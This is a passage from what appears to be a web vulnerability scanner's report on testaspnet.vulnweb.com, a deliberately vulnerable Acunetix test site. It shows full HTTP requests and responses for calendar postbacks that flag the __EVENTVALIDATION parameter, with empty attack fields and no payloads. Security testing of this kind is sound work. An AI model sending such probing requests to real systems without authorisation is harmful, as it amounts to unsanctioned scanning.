style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8169&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAZLA8NdoIZGRkduA%2FLQ5Wnxe00apmL94ZcYE8Umc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK2rqqzBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPms2yZp%2FtyGnK7VeIfMwBNoVMFWQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:53 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAZLA8NdoIZGRkduA/LQ5Wnxe00apmL94ZcYE8Umc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK2rqqzBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPms2yZp/tyGnK7VeIfMwBNoVMFWQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:White" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8160&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBArDIqLtoIZGRk%2B9LrLPkyx86qRomarVABS5e5mXg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK2xKraDwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPwJlq4HHnmMEXboVgbEKkwTv8k3o%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:38 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBArDIqLtoIZGRk+9LrLPkyx86qRomarVABS5e5mXg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK2xKraDwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPwJlq4HHnmMEXboVgbEKkwTv8k3o=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:White" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a 